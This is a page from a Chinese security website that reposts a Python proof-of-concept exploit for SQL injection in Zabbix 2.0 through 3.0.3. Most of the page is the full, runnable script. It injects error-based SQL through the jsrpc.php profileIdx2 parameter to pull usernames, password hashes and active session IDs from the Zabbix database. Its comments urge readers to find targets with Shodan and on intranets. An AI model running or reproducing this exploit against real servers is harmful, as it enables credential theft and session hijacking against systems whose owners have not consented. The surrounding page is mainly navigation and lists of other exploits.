首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Zabbix 2.0 - 3.0.3 - SQL Injection 来源：Zzzians@gmail.com 作者：Zzzians 发布时间：2016-09-09   # Exploit Title: 2.0 < Zabbix < 3.0.4 SQL Injection Python PoC # Data: 20-08-2016 # Software Link: www.zabbix.com # Exploit Author: Unknown(http://seclists.org/fulldisclosure/2016/Aug/82) # Version: Zabbix 2.0-3.0.x(<3.0.4)   # PoC Author: Zzzians # Contact: Zzzians@gmail.com # Test on: Linux (Debian/CentOS/Ubuntu)   # -*- coding: utf_8 -*- # Use Shodan or and enjoy :) # Comb the intranet for zabbix and enjoy :) import sys,os,re,urllib2 def Inject(url,sql,reg):     payload = url + "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + urllib2.quote(         sql) + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"     try:         response = urllib2.urlopen(payload, timeout=20).read()     except Exception, msg:         print '\t\tOpps,an error occurs...',msg     else:         result_reg = re.compile(reg)         results = result_reg.findall(response)         print payload #Uncomment this to see details         if results:             return results[0] def exploit(url,userid):     passwd_sql = "(select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT "+str(userid-1)+",1),floor(rand(0)*2))x from information_schema.tables group by x)a)"     session_sql="(select 1 from (select count(*),concat((select(select concat(cast(concat(sessionid,0x7e,userid,0x7e,status) as char),0x7e)) from zabbix.sessions where status=0 and userid="+str(userid)+" LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"     password = Inject(url,passwd_sql,r"Duplicate\s*entry\s*'(.+?)~~")     if(password):         print '[+]Username~Password : %s' % password     else:         print '[-]Get Password Failed'     session_id = Inject(url,session_sql,r"Duplicate\s*entry\s*'(.+?)~")     if(session_id):         print "[+]Session_id：%s" % session_id     else:         print "[-]Get Session id Failed"     print '\n'          def main():     print '=' * 70     print '\t    2.0.x?  <  Zabbix  <  3.0.4 SQL Inject Python Exploit Poc'     print '\t\t    Author:Zzzians(Zzzians@gmail.com)'     print '\t    Reference:http://seclists.org/fulldisclosure/2016/Aug/82'     print '\t\t\t    Time：2016-08-20\n'     urls = ["http://10.15.5.86"]     ids = [1,2]     for url in urls:         if url[-1] != '/': url += '/'         print '='*25 +  url + '='*25         for userid in ids:             exploit(url,userid) main()   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Apple iCloud Desktop Client 5. ·Vodafone Mobile Wifi - Reset A ·LogMeIn Client 1.3.2462 (64bit ·LamaHub 0.0.6.2 - Buffer Overf ·Dropbox Desktop Client 9.4.49 ·Apache/mod_ssl OpenSSL < 0.9.6 ·MySQL / MariaDB / PerconaDB 5. ·Adobe ColdFusion < 11 Update 1 ·Samsung Repair Information Dis ·SugarCRM 6.5.23 - REST PHP Obj ·Inteno EG101R1 VoIP Router Una ·TeamViewer 11.0.65452 (64 bit)   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved